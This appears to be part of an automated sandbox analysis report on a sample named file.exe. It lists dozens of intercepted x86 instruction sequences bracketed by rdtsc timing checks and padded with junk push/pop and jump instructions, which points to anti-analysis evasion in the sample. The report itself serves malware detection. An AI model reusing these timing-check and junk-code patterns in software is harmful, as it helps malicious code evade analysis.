                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135747C second address: 135749A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF6744C8C9Ch 0x00000010 jc 00007FF6744C8C96h 0x00000016 push eax 0x00000017 jns 00007FF6744C8C96h 0x0000001d pop eax 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135AB49 second address: 135AB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jno 00007FF674E409B6h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF674E409BAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135ACC9 second address: 135ACD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135B0A0 second address: 135B0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FF674E409B6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135B0AF second address: 135B0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135B0B5 second address: 135B0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF674E409B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135B0BF second address: 135B0D5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF6744C8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FF6744C8CA7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135B0D5 second address: 135B0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF674E409BBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361020 second address: 1361024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361024 second address: 136104B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FF674E409BAh 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136104B second address: 1361052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361052 second address: 1361058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361197 second address: 136119B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136119B second address: 13611B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FF674E409C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136134B second address: 1361363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6744C8CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361363 second address: 136138A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF674E409B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d jne 00007FF674E409D7h 0x00000013 push eax 0x00000014 jmp 00007FF674E409C1h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13616AC second address: 13616CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FF6744C8C9Ch 0x0000000f js 00007FF6744C8C96h 0x00000015 jmp 00007FF6744C8C9Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361CE0 second address: 1361CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361CE6 second address: 1361CFF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF6744C8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF6744C8C9Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361CFF second address: 1361D05 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361FBC second address: 1361FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361FC2 second address: 1361FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361FCE second address: 1361FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF6744C8CA0h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362BD3 second address: 1362C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007FF674E409BAh 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push esi 0x00000010 jmp 00007FF674E409C7h 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 jnl 00007FF674E409CCh 0x0000001e popad 0x0000001f push edi 0x00000020 jmp 00007FF674E409C8h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF674E409BFh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B5DA second address: 136B5F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B5F6 second address: 136B60A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FF674E409B6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007FF674E409B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B768 second address: 136B76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B76C second address: 136B78F instructions: 0x00000000 rdtsc 0x00000002 js 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FF674E409C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B8CD second address: 136B8E5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF6744C8C96h 0x00000008 jne 00007FF6744C8C96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007FF6744C8C9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BB8B second address: 136BB8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BB8F second address: 136BB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BB95 second address: 136BB9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BB9A second address: 136BBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF6744C8C96h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BD13 second address: 136BD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BEC4 second address: 136BEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C144 second address: 136C14A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372934 second address: 137293C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372BE3 second address: 1372BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF674E409B6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372BF5 second address: 1372C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF6744C8C9Fh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372D6C second address: 1372D7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FF674E409B6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372D7D second address: 1372DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF6744C8CA5h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF6744C8CA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373527 second address: 1373538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373538 second address: 1373542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373542 second address: 1373548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AA89 second address: 137AA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AA8D second address: 137AA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AA96 second address: 137AA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AA9E second address: 137AAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AAA5 second address: 137AAAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF6744C8C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AAAF second address: 137AAC1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FF674E409B6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AAC1 second address: 137AAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AAC5 second address: 137AAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007FF674E409B6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AC22 second address: 137AC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007FF6744C8CADh 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF6744C8CA5h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AC5F second address: 137AC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AC63 second address: 137AC70 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF6744C8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A136 second address: 138A148 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FF674E409B8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A148 second address: 138A161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6744C8CA4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A161 second address: 138A167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A167 second address: 138A18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FF6744C8C9Ch 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FF6744C8C9Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A18F second address: 138A1B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF674E409C3h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1392A49 second address: 1392A59 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF6744C8CA2h 0x00000008 jng 00007FF6744C8C96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1392A59 second address: 1392A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CFC0 second address: 139CFCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF6744C8C96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6219 second address: 13A621D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A621D second address: 13A6228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A53EC second address: 13A53F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A53F2 second address: 13A53F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A53F6 second address: 13A53FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A5542 second address: 13A5548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8F3C second address: 13A8F40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8F40 second address: 13A8F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FF6744C8CA2h 0x0000000c ja 00007FF6744C8CA0h 0x00000012 jmp 00007FF6744C8C9Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jp 00007FF6744C8C96h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8AA9 second address: 13A8AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8AAF second address: 13A8ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6744C8CA8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8ACD second address: 13A8AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8C34 second address: 13A8C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8C9Eh 0x00000007 jng 00007FF6744C8C96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF6744C8CA8h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8C64 second address: 13A8C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8C7A second address: 13A8C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF2DF second address: 13AF2E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF2E5 second address: 13AF311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF6744C8C9Fh 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FF6744C8C9Fh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAD5B second address: 13BAD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAD66 second address: 13BAD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAD6A second address: 13BAD70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAD70 second address: 13BAD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAD7A second address: 13BAD7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAD7E second address: 13BAD88 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6744C8C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAD88 second address: 13BAD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7BC4 second address: 13C7BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7BC8 second address: 13C7BD2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7BD2 second address: 13C7BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7BD6 second address: 13C7BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8603 second address: 13D8609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D73D9 second address: 13D73DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D786C second address: 13D7871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7A15 second address: 13D7A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF674E409B6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7A20 second address: 13D7A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FF6744C8C96h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7CF0 second address: 13D7CFA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF674E409B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7CFA second address: 13D7D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7D06 second address: 13D7D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAF5D second address: 13DAF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB1EF second address: 13DB1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB1F3 second address: 13DB1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
